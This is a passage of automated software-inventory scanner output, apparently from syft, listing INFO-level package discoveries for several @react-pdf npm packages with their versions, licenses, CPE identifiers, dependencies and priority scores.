0e189b3633f52f28 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/font 2.5.2' title: '@react-pdf/font 2.5.2' description: 'Package discovered: @react-pdf/font 2.5.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 15064a64821e35da name: '@react-pdf/font' version: 2.5.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/font:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/font:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/font:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/font:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/font@2.5.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/font/-/font-2.5.2.tgz integrity: sha512-Ud0EfZ2FwrbvwAWx8nz+KKLmiqACCH9a/N/xNDOja0e/YgSnqTpuyHegFBgIMKjuBtO5dNvkb4dXkxAhGe/ayw== dependencies: '@babel/runtime': ^7.20.13 '@react-pdf/types': ^2.6.0 cross-fetch: ^3.1.5 fontkit: ^2.0.2 is-url: ^1.2.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 325345669fb318b9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/font 4.0.8' title: '@react-pdf/font 4.0.8' description: 'Package discovered: @react-pdf/font 4.0.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 19aa56c736ba6f4e name: '@react-pdf/font' version: 4.0.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/font:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/font:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/font:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/font:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/font@4.0.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/font/-/font-4.0.8.tgz integrity: sha512-deNd+emtZAJho1IlzKL9bRoLAGv/6oXOIKO2oZfs4RuXUrK1onLHbJO7e2YoVLPFP/sQxisRTnzdJFtd35iKwA== dependencies: '@react-pdf/pdfkit': ^5.1.1 '@react-pdf/types': ^2.11.1 fontkit: ^2.0.2 is-url: ^1.2.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a9ddc08bb5c72c17 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/image 2.3.6' title: '@react-pdf/image 2.3.6' description: 'Package discovered: @react-pdf/image 2.3.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e700f7d1572a4159 name: '@react-pdf/image' version: 2.3.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/image:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/image:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/image:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/image:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/image@2.3.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/image/-/image-2.3.6.tgz integrity: sha512-7iZDYZrZlJqNzS6huNl2XdMcLFUo68e6mOdzQeJ63d5eApdthhSHBnkGzHfLhH5t8DCpZNtClmklzuLL63ADfw== dependencies: '@babel/runtime': ^7.20.13 '@react-pdf/png-js': ^2.3.1 cross-fetch: ^3.1.5 jay-peg: ^1.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 751c0bb9092b6d5a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/layout 3.13.0' title: '@react-pdf/layout 3.13.0' description: 'Package discovered: @react-pdf/layout 3.13.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bfc90f0951098a84 name: '@react-pdf/layout' version: 3.13.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/layout:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/layout:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/layout:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/layout:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/layout@3.13.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/layout/-/layout-3.13.0.tgz integrity: sha512-lpPj/EJYHFOc0ALiJwLP09H28B4ADyvTjxOf67xTF+qkWd+dq1vg7dw3wnYESPnWk5T9NN+HlUenJqdYEY9AvA== dependencies: '@babel/runtime': ^7.20.13 '@react-pdf/fns': 2.2.1 '@react-pdf/image': ^2.3.6 '@react-pdf/pdfkit': ^3.2.0 '@react-pdf/primitives': ^3.1.1 '@react-pdf/stylesheet': ^4.3.0 '@react-pdf/textkit': ^4.4.1 '@react-pdf/types': ^2.6.0 cross-fetch: ^3.1.5 emoji-regex: ^10.3.0 queue: ^6.0.1 yoga-layout: ^2.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 18357a3fbdd2a393 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/pdfkit 3.2.0' title: '@react-pdf/pdfkit 3.2.0' description: 'Package discovered: @react-pdf/pdfkit 3.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3f225c34b86f8909 name: '@react-pdf/pdfkit' version: 3.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/pdfkit@3.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-3.2.0.tgz integrity: sha512-OBfCcnTC6RpD9uv9L2woF60Zj1uQxhLFzTBXTdcYE9URzPE/zqXIyzpXEA4Vf3TFbvBCgFE2RzJ2ZUS0asq7yA== dependencies: '@babel/runtime': ^7.20.13 '@react-pdf/png-js': ^2.3.1 browserify-zlib: ^0.2.0 crypto-js: ^4.2.0 fontkit: ^2.0.2 jay-peg: ^1.0.2 vite-compatible-readable-stream: ^3.6.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a9e659420a7b937a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/pdfkit 5.1.1' title: '@react-pdf/pdfkit 5.1.1' description: 'Package discovered: @react-pdf/pdfkit 5.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 24d45580f4c0f7bb name: '@react-pdf/pdfkit' version: 5.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/pdfkit@5.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-5.1.1.tgz integrity: sha512-wNcdSsNlNYyGHGAgIdt453egBF7fiF9UxpRlklUfVvu8OWCrUppG9xiUrPLVoKiqWet5tMi0w6LmuFUJuYqjEg== dependencies: '@babel/runtime': ^7.20.13 '@noble/ciphers': ^1.0.0 '@noble/hashes': ^1.6.0 browserify-zlib: ^0.2.0 fontkit: ^2.0.2 jay-peg: ^1.1.1 js-md5: ^0.8.3 linebreak: ^1.1.0 png-js: ^2.0.0 vite-compatible-readable-stream: ^3.6.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: aadf20f14ed3a63a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/png-js 2.3.1' title: '@react-pdf/png-js 2.3.1' description: 'Package discovered: @react-pdf/png-js 2.3.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ecd22ec88d1d110f name: '@react-pdf/png-js' version: 2.3.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/png-js:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/png-js:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/png_js:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/png_js:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/png:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/png:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/png:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/png:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/png-js@2.3.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/png-js/-/png-js-2.3.1.tgz integrity: sha512-pEZ18I4t1vAUS4lmhvXPmXYP4PHeblpWP/pAlMMRkEyP7tdAeHUN7taQl9sf9OPq7YITMY3lWpYpJU6t4CZgZg== dependencies: browserify-zlib: ^0.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4f8cb527e021a217 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/primitives 3.1.1' title: '@react-pdf/primitives 3.1.1' description: 'Package discovered: @react-pdf/primitives 3.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 18694a13e91dacfb name: '@react-pdf/primitives' version: 3.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/primitives@3.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/primitives/-/primitives-3.1.1.tgz integrity: sha512-miwjxLwTnO3IjoqkTVeTI+9CdyDggwekmSLhVCw+a/7FoQc+gF3J2dSKwsHvAcVFM0gvU8mzCeTofgw0zPDq0w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2743499890ec5e22 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/primitives 4.3.0' title: '@react-pdf/primitives 4.3.0' description: 'Package discovered: @react-pdf/primitives 4.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: edf229ed71e6ba52 name: '@react-pdf/primitives' version: 4.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/primitives@4.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/primitives/-/primitives-4.3.0.tgz integrity: sha512-nYXoZ36pvwNzbc54+DbL8RCn15jU7woJ9D/svnh5tpUXekJ+CbI4mZLo6boSv24CvJgychOu6h7gxX03B4ps0A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ea34747c8a1e8321 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/render 3.5.0' title: '@react-pdf/render 3.5.0' description: 'Package discovered: @react-pdf/render 3.5.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3e1fba314601b9a8 name: '@react-pdf/render' version: 3.5.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/render:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/render:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/render:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/render:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/render@3.5.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/render/-/render-3.5.0.tgz integrity: sha512-gFOpnyqCgJ6l7VzfJz6rG1i2S7iVSD8bUHDjPW9Mze8TmyksHzN2zBH3y7NbsQOw1wU6hN4NhRmslrsn+BRDPA== dependencies: '@babel/runtime': ^7.20.13 '@react-pdf/fns': 2.2.1 '@react-pdf/primitives': ^3.1.1 '@react-pdf/textkit': ^4.4.1 '@react-pdf/types': ^2.6.0 abs-svg-path: ^0.1.1 color-string: ^1.9.1 normalize-svg-path: ^1.1.0 parse-svg-path: ^0.1.2 svg-arc-to-cubic-bezier: ^3.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9ecea192844aa50b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/renderer 3.4.5' title: '@react-pdf/renderer 3.4.5' description: 'Package discovered: @react-pdf/renderer 3.4.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d2a573a75d297737 name: '@react-pdf/renderer' version: 3.4.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/renderer:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/renderer:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/renderer:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/renderer:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/renderer@3.4.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/renderer/-/renderer-3.4.5.tgz integrity: sha512-O1N8q45bTs7YuC+x9afJSKQWDYQy2RjoCxlxEGdbCwP+WD5G6dWRUWXlc8F0TtzU3uFglYMmDab2YhXTmnVN9g== dependencies: '@babel/runtime': ^7.20.13 '@react-pdf/font': ^2.5.2 '@react-pdf/layout': ^3.13.0 '@react-pdf/pdfkit': ^3.2.0 '@react-pdf/primitives': ^3.1.1 '@react-pdf/render': ^3.5.0 '@react-pdf/types': ^2.6.0 events: ^3.3.0 object-assign: ^4.1.1 prop-types: ^15.6.2 queue: ^6.0.1 scheduler: ^0.17.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 25636a50f9953390 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/stylesheet 4.3.0' title: '@react-pdf/stylesheet 4.3.0' description: 'Package discovered: @react-pdf/stylesheet 4.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 618f90b9a2f3d884 name: '@react-pdf/stylesheet' version: 4.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/stylesheet@4.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-4.3.0.tgz integrity: sha512-x7IVZOqRrUum9quuDeFXBveXwBht+z/6B0M+z4a4XjfSg1vZVvzoTl07Oa1yvQ/4yIC5yIkG2TSMWeKnDB+hrw== dependencies: '@babel/runtime': ^7.20.13 '@react-pdf/fns': 2.2.1 '@react-pdf/types': ^2.6.0 color-string: ^1.9.1 hsl-to-hex: ^1.0.0 media-engine: ^1.0.3 postcss-value-parser: ^4.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 97286ac4a749af60 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/stylesheet 6.2.1' title: '@react-pdf/stylesheet 6.2.1' description: 'Package discovered: @react-pdf/stylesheet 6.2.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ff4544477cbe31d7 name: '@react-pdf/stylesheet' version: 6.2.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: 